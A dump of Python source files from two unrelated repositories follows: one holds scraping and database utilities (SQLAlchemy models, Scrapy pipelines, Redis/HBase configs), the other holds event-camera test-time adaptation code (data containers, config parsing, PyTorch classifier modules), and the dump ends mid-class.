self.download_state = kw.get("download_state", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.is_parsed = kw.get("is_parsed", None)
self.keywords = kw.get("keywords", None)
self.link_hash = kw.get("link_hash", None)
self.meta_data = kw.get("meta_data", None)
self.meta_description = kw.get("meta_description", None)
self.meta_favicon = kw.get("meta_favicon", None)
self.meta_img = kw.get("meta_img", None)
self.meta_keywords = kw.get("meta_keywords", None)
self.meta_lang = kw.get("meta_lang", None)
self.metadata = kw.get("metadata", None)
self.movies = kw.get("movies", None)
self.publish_date = kw.get("publish_date", None)
self.source_url = kw.get("source_url", None)
self.summary = kw.get("summary", None)
self.tags = kw.get("tags", None)
self.text = kw.get("text", None)
self.title = kw.get("title", None)
self.top_image = kw.get("top_image", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class ProductType(Base, BaseModel):
__tablename__ = 'wp_saas_product_type'
id = Column(INTEGER(11), primary_key=True)
product_id = Column(INTEGER(11))
type_id = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.product_id = kw.get("product_id", None)
self.type_id = kw.get("type_id", None)
self.update_ts = kw.get("update_ts", None)
class Types(Base, BaseModel):
__tablename__ = 'wp_saas_types'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(255))
p_id = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.p_id = kw.get("p_id", None)
self.update_ts = kw.get("update_ts", None)
class ProductFromNews(Base, BaseModel):
__tablename__ = 'wp_saas_product_from_news'
id = Column(INTEGER(11), primary_key=True)
news_id = Column(INTEGER(11), index=True)
title = Column(String(255), index=True)
products = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.news_id = kw.get("news_id", None)
self.products = kw.get("products", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
if __name__ == '__main__':
createInitFunction(BaiduAdvertisement)
```
#### File: SqlAlchemy/Weibo/UserItemModel.py
```python
import XX.Model.SqlAlchemy.BaseModel as BM
from sqlalchemy import Column, String
from sqlalchemy.dialects.mysql import INTEGER, TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class UserItem(Base, BM.BaseModel):
__tablename__ = 'user_items'
id = Column(INTEGER(11), primary_key=True)
uid = Column(INTEGER(11))
item_name = Column(String(60))
item_content = Column(String(255))
is_del = Column(TINYINT(1))
create_ts = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.item_content = kw.get("item_content", None)
self.item_name = kw.get("item_name", None)
self.metadata = kw.get("metadata", None)
self.uid = kw.get("uid", None)
self.update_ts = kw.get("update_ts", None)
if __name__ == '__main__':
BM.createInitFunction(UserItem)
```
#### File: SqlAlchemy/ZhiHan/CarBrandsModel.py
```python
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from XX.Model.SqlAlchemy.BaseModel import BaseModel
Base = declarative_base()
metadata = Base.metadata
class CarBrandsModel(Base, BaseModel):
__tablename__ = 'car_brands'
id = Column(Integer, primary_key=True)
brand_id = Column(Integer)
brands_web_id = Column(Integer, unique=True)
name = Column(String(255), index=True)
brandsIsInlet = Column(String(10))
is_del = Column(Integer)
create_ts = Column(Integer)
update_ts = Column(Integer)
__table_args__ = {
"mysql_charset": "utf8"
}
def __init__(self, *arg, **kw):
self.brand_id = kw.get("brand_id", None)
self.brandsIsInlet = kw.get("brandsIsInlet", None)
self.brands_web_id = kw.get("brands_web_id", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.update_ts = kw.get("update_ts", None)
@staticmethod
def getBrandsByWebId(web_id, session):
return session.query(CarBrandsModel).filter(CarBrandsModel.brands_web_id == web_id).all()
```
#### File: SqlAlchemy/ZhiHan/ForumModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import BaseModel
from sqlalchemy import Column, Integer, String, text
from sqlalchemy.dialects.mysql.types import TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class Forum(Base, BaseModel):
__tablename__ = 'forum'
id = Column(Integer, primary_key=True)
name = Column(String(255))
spider_name = Column(String(255))
domain = Column(String(255))
logo = Column(String(255))
thread_count = Column(TINYINT(4), server_default=text("'1'"))
is_del = Column(Integer)
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.id = kw.get("id", None)
self.name = kw.get("name", None)
self.spider_name = kw.get("spider_name", None)
self.domain = kw.get("domain", None)
self.logo = kw.get("logo", None)
self.thread_count = kw.get("thread_count", None)
self.is_del = kw.get("is_del", None)
self.create_ts = kw.get("create_ts", None)
self.update_ts = kw.get("update_ts", None)
@staticmethod
def getSpiderNameByForumId(_id, session):
return session.query(Forum.spider_name).filter(Forum.id == _id).all()
```
#### File: SqlAlchemy/ZhiHan/ForumUrlModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Index, String
from sqlalchemy.dialects.mysql import INTEGER, TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class ForumUrlModel(Base, BaseModel):
__tablename__ = 'forum_url'
__table_args__ = (
Index('forum_id', 'forum_id', 'url'),
)
id = Column(INTEGER(11), primary_key=True)
forum_id = Column(INTEGER(11))
forum_name = Column(String(255))
url = Column(String(255))
is_del = Column(TINYINT(4))
create_ts = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.forum_id = kw.get("forum_id", None)
self.forum_name = kw.get("forum_name", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
if __name__ == '__main__':
createInitFunction(ForumUrlModel)
```
#### File: Model/Struct/HBaseConn.py
```python
import functools
def get_hbase_conn_cfg(**kw):
d = dict()
d["host"] = kw.get("host", "localhost")
# d["username"] = kw.get("username", None)
# d["password"] = kw.get("pwd", None)
d["port"] = kw.get("port", 9090)
d["table"] = kw.get("table", "default")
return d
ubuntu_cfg = functools.partial(get_hbase_conn_cfg, host="192.168.1.44")
zhihan00_cfg = functools.partial(get_hbase_conn_cfg, host="192.168.1.50")
```
#### File: Model/Struct/RedisConn.py
```python
import functools
def get_redis_conn_cfg(**kw):
d = dict()
d["host"] = kw.get("host", "localhost")
d["pwd"] = kw.get("pwd", None)
d["port"] = kw.get("port", 6379)
d["db"] = kw.get("db", 0)
d["decode_responses"] = kw.get("decode_responses", True)
return d
ali_cfg = functools.partial(get_redis_conn_cfg, host="172.16.31.10", pwd="<PASSWORD>", db=0)
ali2_cfg = functools.partial(get_redis_conn_cfg, host="192.168.3.11", pwd="<PASSWORD>", db=0)
ubuntu_cfg = functools.partial(get_redis_conn_cfg, host="192.168.1.44", db=0)
local = functools.partial(get_redis_conn_cfg, host="localhost", db=0)
zhihan00 = functools.partial(get_redis_conn_cfg, host="zhihan00", db=0)
```
#### File: XX/Multiprocess/Callback.py
```python
def msg(msg, *arg, **kw):
print("---" * 60)
print("callback -------> {}".format(msg))
print("---" * 60)
if __name__ == "__main__":
pass
```
#### File: Scrapy/DM/LogDM.py
```python
import XX.Date.DatetimeHelper as ctime
class ToCrawlUrl(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
return cls()
def process_request(self, request, spider):
save_path = ToCrawlUrl.settings.get("ROOT_PATH_LOG") + ctime.get_today() + "_to_crawl.log"
log_file(save_path, str(ctime.get_now_time()) + "\t" + spider.name + "\t" + request.url + "\n", method="a")
# 记录成功抓了哪些url
class CrawledUrl(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
return cls()
def process_response(self, request, response, spider):
save_path = CrawledUrl.settings.get("ROOT_PATH_LOG") + ctime.get_today() + "_carwled.log"
log_file(save_path, str(ctime.get_now_time()) + "\t" + spider.name + "\t" + str(
response.status) + "\t" + request.url + "\n",
method="a")
return response
```
#### File: Scrapy/Pipeline/PipeLine.py
```python
import json
import os
import time
from logzero import logger
from thrift.transport import TSocket
import XX.DB.SqlAlchemyHelper as sa
import XX.Encrypt.EncryptHelper as enc
import XX.File.FileHelper as cf
import XX.HTML.HtmlHelper as chtml
import XX.Tools.BuiltinFunctions as bf
# File pipeline:放到今日文件中
class FilePipeline(object):
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
cls.cacheFilePath = settings.get("FUN_CACHE_FILE_PATH")
cls.settings = settings
return cls()
def process_item(self, item, spider):
# 数据处理
item = chtml.parseDict(item)
today = time.strftime("%Y_%m_%d", time.localtime(int(time.time())))
json_str = json.dumps(item, ensure_ascii=False)
# 保存数据到文件
file_path = FilePipeline.settings.get("ROOT_PATH_JSON") + spider.name + os.sep + today + ".json"
cf.FileHelper.save_file(file_path, json_str + "\n")
return item
# 放到MySQL数据库
class MysqlPipeline(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
cls.session = sa.SqlAlchemyHelper.get_session_by_cfg(cls.settings.get("MCFG"))
return cls()
def process_item(self, item, spider):
import importlib
module = importlib.import_module("Util.Json2Mysql", MysqlPipeline.settings.get("PROJECT_PATH"))
if hasattr(module, spider.name):
getattr(module, spider.name)(item, self.session)
else:
logger.info("No Json2Mysql function")
return item
# 放到Mongo数据库
class MongoPipeline(object):
def process_item(self, item, spider):
return item
# 放到Kakfa队列
class KafkaPipeline(object):
def __init__(self):
from pykafka import KafkaClient
self.client = KafkaClient(hosts="LOCALHOST" + ":6667")
def process_item(self, item, spider):
topicdocu = self.client.topics[spider.name]
producer = topicdocu.get_producer()
# 数据处理
item = chtml.parseDict(item)
json_str = json.dumps(item, ensure_ascii=False)
producer.produce(json_str)
bf.printFromHead(spider.name + "\tAdd kafka")
return item
class HivePipeline(object):
def process_item(self, item, spider):
return item
class SparkPipeline(object):
def process_item(self, item, spider):
return item
class StormPipeline(object):
def process_item(self, item, spider):
return item
class HBasePipeline(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
def __init__(self):
self.transport = TSocket.TSocket(self.settings.get("HBASE_HOST", "localhost"), self.settings.get("HBASE_PORT", 9090))
self.transport.open()
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
self.client = Hbase.Client(self.protocol)
# 判断是否有表,没有则生成
tables = self.client.getTableNames()
self.table_name = "crawl_" + self.settings.get("PROJECT_NAME", self.settings.get("BOT_NAME", "crawl"))
if self.table_name not in tables:
source = ColumnDescriptor(name='source')
data = ColumnDescriptor(name='data')
self.client.createTable(self.table_name, [source, data])
def process_item(self, item, spider):
# 保存到crawl_project表中 spider_name+md5(url) rowkey中,data:json_str中
# crawl_project > spider_name+md5(url) > data:json_str
url = item.get("url")
if url:
row = spider.name + "_" + enc.Encrypt.md5(url)
mutations = list()
mutations.append(Mutation(column="data:json", value=str(json.dumps(item, ensure_ascii=False))))
self.client.mutateRow(self.table_name, row, mutations)
logger.info("Pipeline Data 2 HBase\t" + row)
else:
logger.info("No url from spider \t" + spider.name)
return item
def close_spider(self, spider):
self.transport.close()
class TestPipeline(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
def process_item(self, item, spider):
print("===" * 44)
print(TestPipeline.settings)
print(dir(spider))
print(dir(self))
print("===" * 44)
```
#### File: XX/Scrapy/ReLoadCache.py
```python
import os
import pickle
import XX.File.FileHelper as uf
def reload_cache(cache_rp):
for fp, fn in uf.FileHelper.get_file_list(cache_rp):
yield pickle.load(open(fp + os.sep + fn, "rb"))
```
#### File: XX/Selenium/Headless.py
```python
from selenium import webdriver
def get(url):
options = webdriver.FirefoxOptions()
options.set_headless()
options.add_argument('-headless')
options.add_argument('--disable-gpu')
driver = webdriver.Firefox(firefox_options=options)
driver.get(url)
driver.close()
html = driver.page_source
return html
if __name__ == '__main__':
print(get("http://httpbin.org/get"))
```
#### File: XX/String/RegExpHelper.py
```python
import re
class RegExpHelper():
# TODO:debug 其他图片 以img开头的图片的url
@staticmethod
def get_img_urls(html):
return re.findall('http.+\.jpg', html)
@staticmethod
def get_url_from_html(txt):
return re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')", txt)
@staticmethod
def get_url_from_text(txt):
return re.findall(r"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+", txt)
@staticmethod
def get_ip(txt):
return re.findall(r"((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))))", txt)
@staticmethod
def replace_continuous_blank_2_one(txt):
return re.sub(' +', ' ', txt)
@staticmethod
def get_date(txt):
if not txt or isinstance(txt, str):
return
return re.findall(r"(\d{4}-\d{1,2}-\d{1,2})", txt)
@staticmethod
def repleaseEmoji(sourceStr, replaceStr=''):
if isinstance(sourceStr, str):
try:
co = re.compile('[\U00010000-\U0010ffff]')
except re.error:
import traceback
co = re.compile('[\uD800-\uDBFF][\uDC00-\uDFFF]')
return co.sub(sourceStr, replaceStr)
else:
return sourceStr
if __name__ == "__main__":
print(RegExpHelper.repleaseEmoji("加油, 我们与你同在![抱抱]🌹", "??111"))
exit()
content = "<td class='info_d'><div class='info'><a href='//car.autohome.com.cn/pic/series-s17694/49.html?pvareaid=101281'>图片</a><a href='spec/17694/config.html?pvareaid=101282'>参数配置</a>"
content = "https://www.jb51.net/article/98054.htm"
for l in RegExpHelper.get_url_from_text(content):
print(l)
```
#### File: XX/Tools/create_hive_table.py
```python
import pymysql
def get_table_info(table, schema='', ispartition=True):
cols = []
create_head = """ create external table if not exists {0}.{1}(\n""".format(schema, table)
if ispartition:
create_tail = """\npartitioned by(inc_day string)\nrow format delimited fields terminated by '\\t' \n location '/hivetable/{0}';""".format(table)
else:
create_tail = """\nrow format delimited fields terminated by '\\t' \nlocation '/hivetable/{0}';""".format(table)
connection = pymysql.connect(host='192.168.1.44',user='root',password='<PASSWORD>',db='sqoop',port=3306,charset='utf8')
try:
# 获取一个游标
with connection.cursor(cursor=pymysql.cursors.DictCursor) as cursor:
sql = 'SHOW FULL FIELDS FROM {0}'.format(table)
cout = cursor.execute(sql) # 返回记录条数
try:
for row in cursor: # cursor.fetchall()
cols.append(row['Field'])
if 'bigint' in row['Type']:
row['Type'] = "bigint"
elif 'int' in row['Type'] or 'tinyint' in row['Type'] or 'smallint' in row['Type'] or 'mediumint' in row['Type'] or 'integer' in row['Type']:
row['Type'] = "int"
elif 'double' in row['Type'] or 'float' in row['Type'] or 'decimal' in row['Type']:
row['Type'] = "double"
else:
row['Type'] = "string"
create_head += row['Field'] + ' ' + row['Type'] + ' comment \'' + row['Comment'] + '\' ,\n'
except:
import traceback
traceback.print_exc()
print('程序异常!')
finally:
connection.close()
create_str = create_head[:-2] + '\n' + ')' + create_tail
return cols, create_str # 返回字段列表与你建表语句
cols, create_str = get_table_info("customer")
print(create_str)
``` |
{
"source": "82magnolia/3DLineDetection",
"score": 3
} |
#### File: 3DLineDetection/python/convert_pcd.py
```python
import argparse
import os
import shutil
from glob import glob
import numpy as np
def ig_f(dir, files):
# Ignore files
return [f for f in files if os.path.isfile(os.path.join(dir, f))]
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='line_3d')
parser.add_argument('--file_dir', help='Directory where point clouds are located')
parser.add_argument('--new_file_dir', help='Directory where new point clouds will be saved')
args = parser.parse_args()
# Copy directories
shutil.copytree(args.file_dir, args.new_file_dir, ignore=ig_f)
# Get all point cloud filenames in file_dir
filenames = sorted(glob(os.path.join(args.file_dir, '**', '*.txt'), recursive=True))
os.chdir('../src/')
for idx, f in enumerate(filenames):
print(f"\n======== Progress: {idx + 1} / {len(filenames)} ========\n")
new_f = f.replace(args.file_dir, args.new_file_dir)
pcd = np.loadtxt(f)
np.savetxt(new_f, pcd[:, :3])
os.chdir('../python/')
``` |
{
"source": "82magnolia/ev_tta",
"score": 4
} |
#### File: base/data/data_container.py
```python
from abc import ABC, abstractmethod
from math import ceil
class DataContainer(ABC):
"""
Abstract class defining data container.
A typical data container will encompass all the utilities related to dataset generation and loading.
Note that cfg contains all the neccessary data needed to create a dataset.
"""
def __init__(self, cfg, **kwargs):
super(DataContainer, self).__init__()
self.cfg = cfg
# dataset is a dict containing different torch.utils.data.Dataset instances
self.dataset = {'train': None, 'test': None, 'val': None}
# dataloader is a dict containing different torch.utils.data.DataLoader instances
self.dataloader = {'train': None, 'test': None, 'val': None}
@abstractmethod
def gen_dataset(self, **kwargs):
"""
Method for generating dataset. Sets the key-value pairs in self.dataset.
"""
pass
@abstractmethod
def gen_dataloader(self, **kwargs):
"""
Method for creating dataloader. Sets the key-value pairs in self.dataloader.
It is highly recommended to write a custom collate_fn, to pass around data as a dictionary.
This enables efficient code recycling.
"""
assert self.dataset is not None
class DataChunkContainer(DataContainer):
"""
Abstract class defining data chunk container. Data will be pre-loaded into RAM for faster data loading.
For DataChunkContainer to successfully work, the Dataset generated from gen_dataset should be an instance of ChunkDataset.
"""
def __init__(self, cfg, **kwargs):
super(DataChunkContainer, self).__init__(cfg)
self.chunk_every = ceil(self.cfg.chunk_size / self.cfg.batch_size)
def create_chunk(self, batch_idx, mode):
"""
Load chunk to RAM.
"""
if batch_idx % self.chunk_every == 0:
print(f"Creating chunk with index {self.dataset[mode].chunk_idx}")
self.dataset[mode].load_chunk()
def refresh_chunk(self, mode):
"""
Free chunk, and prepare for new epoch.
"""
print("Refreshing chunk!")
self.dataset[mode].restart_chunk()
self.dataset[mode].free_chunk()
self.dataset[mode].shuffle_index()
def release_chunk(self, mode):
"""
Free chunk to save RAM.
"""
print("Releasing chunk!")
self.dataset[mode].free_chunk()
```
#### File: base/data/dataset.py
```python
from torch.utils.data import Dataset
class ChunkDataset(Dataset):
"""
Class implementing chunk-based loading.
"""
def __init__(self, cfg, mode='train'):
super(ChunkDataset, self).__init__()
self.cfg = cfg
self.mode = mode
self.chunk_idx = 0 # Next chunk index to load
def shuffle_index(self):
"""
Shuffle indices for re-sampling chunk.
"""
raise NotImplementedError
def load_chunk(self):
"""
Load a chunk to RAM.
"""
raise NotImplementedError
def restart_chunk(self):
self.chunk_idx = 0
def free_chunk(self):
"""
Free all reserved chunks to save RAM space.
"""
raise NotImplementedError
```
#### File: base/utils/parse_utils.py
```python
from collections import namedtuple
import configparser
from ast import literal_eval
from pathlib import Path
NO_PARSE = ['name', 'load_model'] # List of names to avoid parsing
EXCEPT_NONE = ['load_model']
def parse_ini(config_path: str):
read_config = configparser.ConfigParser()
config_name = Path(config_path).stem
read_config.read(config_path)
config_attribs = []
data_dict = {}
for section in read_config.sections():
for (key, value) in read_config.items(section):
config_attribs.append(key)
data_dict[key] = parse_value(value) if key not in NO_PARSE else value
if key in EXCEPT_NONE and value == 'None': # Account for None
data_dict[key] = None
# Modify name just in case of errors
data_dict['name'] = config_name
Config = namedtuple('Config', config_attribs)
cfg = Config(**data_dict)
return cfg
def parse_value(value):
if value.replace('.', '', 1).replace('+', '', 1).replace('-', '', 1).replace('e', '', 1).isdigit():
# Exponential format and decimal format should be accounted for
return literal_eval(value)
elif value == 'True' or value == 'False':
if value == 'True':
return True
else:
return False
elif value == 'None':
return None
elif ',' in value: # Config contains lists
is_number = any(char.isdigit() for char in value.split(',')[0])
items_list = value.split(',')
if '' in items_list:
items_list.remove('')
if is_number:
return [literal_eval(val) for val in items_list]
else:
if '\"' in items_list[0] and '\'' in items_list[0]:
return [literal_eval(val.strip()) for val in items_list]
else:
return [val.strip() for val in items_list]
else:
return value
```
#### File: real_cnn_model/exp_utils/tent_exp.py
```python
from real_cnn_model.data.data_container import EvTTAImageNetContainer
from real_cnn_model.models.model_container import EvTTACNNContainer
from real_cnn_model.train.trainer import EvTTACNNTrainer
import configparser
def run_exp(cfg):
"""
Run normal train / test
Args:
cfg: Config file containing configs related to experiment
"""
# Make instance of data container
data_container = EvTTAImageNetContainer(cfg)
# Make instance of model container
model_container = EvTTACNNContainer(cfg)
# Make instance of trainer
trainer = EvTTACNNTrainer(cfg, model_container, data_container)
config = configparser.ConfigParser()
config.add_section('Default')
cfg_dict = cfg._asdict()
for key in cfg_dict:
if key != 'name':
config['Default'][key] = str(cfg_dict[key]).replace('[', '').replace(']', '')
else:
config['Default'][key] = str(cfg_dict[key])
with open(trainer.exp_save_dir / 'config.ini', 'w') as configfile:
config.write(configfile)
# Display model
print(model_container.models['model'])
trainer.run()
```
#### File: real_cnn_model/models/enhanced_classifier.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
try:
import torchsort
except ModuleNotFoundError:
# TODO: Install torchsort in other servers
pass
"""
URIE excerpted from https://github.com/taeyoungson/urie/
"""
class Selector(nn.Module):
def __init__(self, channel, reduction=16, crp_classify=False):
super(Selector, self).__init__()
self.spatial_attention = 4
self.in_channel = channel * (self.spatial_attention ** 2)
self.avg_pool = nn.AdaptiveAvgPool2d((self.spatial_attention, self.spatial_attention))
self.fc = nn.Sequential(
nn.Linear(self.in_channel, self.in_channel // reduction, bias=False),
nn.ReLU(inplace=True),
)
self.att_conv1 = nn.Linear(self.in_channel // reduction, self.in_channel)
self.att_conv2 = nn.Linear(self.in_channel // reduction, self.in_channel)
def forward(self, x):
b, c, H, W = x.size()
y = self.avg_pool(x).view(b, -1)
y = self.fc(y)
att1 = self.att_conv1(y).view(b, c, self.spatial_attention, self.spatial_attention)
att2 = self.att_conv2(y).view(b, c, self.spatial_attention, self.spatial_attention)
attention = torch.stack((att1, att2))
attention = nn.Softmax(dim=0)(attention)
att1 = F.interpolate(attention[0], scale_factor=(H / self.spatial_attention, W / self.spatial_attention), mode="nearest")
att2 = F.interpolate(attention[1], scale_factor=(H / self.spatial_attention, W / self.spatial_attention), mode="nearest")
return att1, att2
class SelectiveConv(nn.Module):
def __init__(self, kernel_size, padding, bias, reduction, in_channels, out_channels, first=False):
super(SelectiveConv, self).__init__()
self.first = first
self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.selector = Selector(out_channels, reduction=reduction)
self.IN = nn.InstanceNorm2d(in_channels)
self.BN = nn.BatchNorm2d(in_channels)
self.relu = nn.LeakyReLU(inplace=True)
def forward(self, x):
if self.first:
f_input = x
s_input = x
else:
f_input = self.BN(x)
f_input = self.relu(f_input)
s_input = self.IN(x)
s_input = self.relu(s_input)
out1 = self.conv1(f_input)
out2 = self.conv2(s_input)
out = out1 + out2
att1, att2 = self.selector(out)
out = torch.mul(out1, att1) + torch.mul(out2, att2)
return out
class SKDown(nn.Module):
def __init__(self, kernel_size, padding, bias, reduction, in_channels, out_channels, first=False):
super(SKDown, self).__init__()
self.maxpool_conv = nn.Sequential(
nn.MaxPool2d(2),
SelectiveConv(kernel_size, padding, bias, reduction, in_channels, out_channels, first=first)
)
def forward(self, x):
return self.maxpool_conv(x)
class SKUp(nn.Module):
def __init__(self, kernel_size, padding, bias, reduction, in_channels, out_channels, bilinear=True):
super().__init__()
# if bilinear, use the normal convolutions to reduce the number of channels
if bilinear:
self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
else:
self.up = nn.ConvTranspose2d(in_channels // 2, in_channels // 2, kernel_size=2, stride=2)
self.conv = SelectiveConv(kernel_size, padding, bias, reduction, in_channels, out_channels)
def forward(self, x1, x2):
x1 = self.up(x1)
diffY = torch.tensor([x2.size()[2] - x1.size()[2]])
diffX = torch.tensor([x2.size()[3] - x1.size()[3]])
x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,
diffY // 2, diffY - diffY // 2])
x = torch.cat([x2, x1], dim=1)
return self.conv(x)
class OutConv(nn.Module):
def __init__(self, in_channels, out_channels):
pass
def forward(self, x):
pass
class SKUNet(nn.Module):
def __init__(self, num_channels, in_kernel_size, mid_kernel_size, bilinear=True):
super(SKUNet, self).__init__()
self.bilinear = bilinear
self.down1 = nn.Conv2d(kernel_size=in_kernel_size, padding=in_kernel_size // 2, in_channels=num_channels, out_channels=32)
self.down2 = SKDown(mid_kernel_size, mid_kernel_size // 2, False, 16, 32, 64)
self.down3 = SKDown(mid_kernel_size, mid_kernel_size // 2, False, 16, 64, 64)
self.up1 = SKUp(mid_kernel_size, mid_kernel_size // 2, False, 16, 128, 32, bilinear)
self.up2 = SKUp(mid_kernel_size, mid_kernel_size // 2, False, 16, 64, 16, bilinear)
self.up3 = nn.Conv2d(kernel_size=mid_kernel_size, padding=mid_kernel_size // 2, in_channels=16, out_channels=num_channels)
def forward(self, x):
x_origin = x
x1 = self.down1(x)
x2 = self.down2(x1)
x3 = self.down3(x2)
x = self.up1(x3, x2)
x = self.up2(x, x1)
x = self.up3(x)
return torch.add(x, x_origin)
# DiffDiST and helper classes
class LinearExp(nn.Module):
def __init__(self, n_in, n_out):
super(LinearExp, self).__init__()
self.weight = nn.Parameter(torch.zeros(n_in, n_out))
self.bias = nn.Parameter(torch.zeros(n_out))
def forward(self, x):
A = torch.exp(self.weight)
return x @ A + self.bias
class ChannelModulation(nn.Module):
def __init__(self, n_in):
super(ChannelModulation, self).__init__()
self.weight = nn.Parameter(torch.ones(n_in), requires_grad=True)
self.bias = nn.Parameter(torch.zeros(n_in), requires_grad=True)
def forward(self, x):
return (x.permute(0, 2, 3, 1) * self.weight + self.bias).permute(0, 3, 1, 2)
class TensorMixer(nn.Module):
def __init__(self, n_in, init_alpha, init_beta):
super(TensorMixer, self).__init__()
self.alpha = nn.Parameter(torch.zeros(n_in).fill_(init_alpha), requires_grad=True)
self.beta = nn.Parameter(torch.zeros(n_in).fill_(init_beta), requires_grad=True)
self.bias = nn.Parameter(torch.zeros(n_in), requires_grad=True)
def forward(self, x1, x2):
# x1, x2 are assumed to have shape (B x C x H x W)
return (x1.permute(0, 2, 3, 1) * self.alpha + x2.permute(0, 2, 3, 1) * self.beta + self.bias).permute(0, 3, 1, 2)
class TransConvBlock(nn.Module):
def __init__(self, n_in, n_hid):
super(TransConvBlock, self).__init__()
self.conv2d = nn.Conv2d(n_in, n_hid, kernel_size=3, padding=1)
self.group_norm = nn.GroupNorm(n_hid, n_hid)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv2d(x)
x = self.group_norm(x)
x = self.relu(x)
return x
class InputTranformNet(nn.Module):
def __init__(self, n_in, n_hid=18, n_layers=6):
super(InputTranformNet, self).__init__()
self.channel_mod = ChannelModulation(n_in)
self.tau = nn.Parameter(torch.ones(1), requires_grad=True)
# Make layers
layers = []
for idx in range(n_layers):
if idx == 0:
layers.append(TransConvBlock(n_in, n_hid))
elif idx == n_layers - 1:
layers.append(TransConvBlock(n_hid, n_in))
else:
layers.append(TransConvBlock(n_hid, n_hid))
self.res_transform = nn.Sequential(*layers)
def forward(self, x):
res_x = self.res_transform(x)
x = self.tau * x + (1 - self.tau) * res_x
x = self.channel_mod(x)
return x
class DiffDiST(nn.Module):
def __init__(self, init_alpha=1.0, init_beta=0.0, init_gamma=1.0, num_groups=4):
# Formula: D = gamma * (argsort(S)) + (1 - gamma) * (monotone(S)), where S = alpha * T + beta * 1 / C
super(DiffDiST, self).__init__()
self.num_groups = num_groups
self.alpha = nn.Parameter(torch.tensor(init_alpha), requires_grad=True)
self.beta = nn.Parameter(torch.tensor(init_beta), requires_grad=True)
self.gamma = nn.Parameter(torch.tensor(init_gamma), requires_grad=True)
def forward(self, x):
print(self.alpha.data.item(), self.beta.data.item(), self.gamma.data.item())
# x is assumed to have shape (B x 4 x H x W)
inv_count = x[:, [0, 2], ...] # (B x 2 x H x W)
time_out = x[:, [1, 3], ...] # (B x 2 x H x W)
result = time_out + self.beta * inv_count
return result
class EnhancedClassifier(nn.Module):
def __init__(self, classifier: nn.Module, enhancer: nn.Module, return_input=False):
super(EnhancedClassifier, self).__init__()
self.classifier = classifier
self.enhancer = enhancer
self.return_input = return_input
def forward(self, x):
if self.return_input:
if self.enhancer is None:
return self.classifier(x), x
else:
x = self.enhancer(x)
return self.classifier(x), x
else:
if self.enhancer is None:
return self.classifier(x)
else:
return self.classifier(self.enhancer(x))
class ProjectionClassifier(nn.Module):
def __init__(self, classifier: nn.Module, projector: nn.Module, return_mode: str):
super(ProjectionClassifier, self).__init__()
self.feature_extractor = nn.Sequential(*list(classifier.children())[:-1])
self.projector = projector
self.final_classifier = classifier.fc
self.return_mode = return_mode
def forward(self, x):
x = self.feature_extractor(x)
x = torch.flatten(x, 1)
proj = x + self.projector(x)
pred = self.final_classifier(proj)
if self.return_mode == 'both':
return pred, proj
elif self.return_mode == 'pred':
return pred
elif self.return_mode == 'proj':
return proj
class Projector(nn.Module):
def __init__(self, dim, hid_dim):
super(Projector, self).__init__()
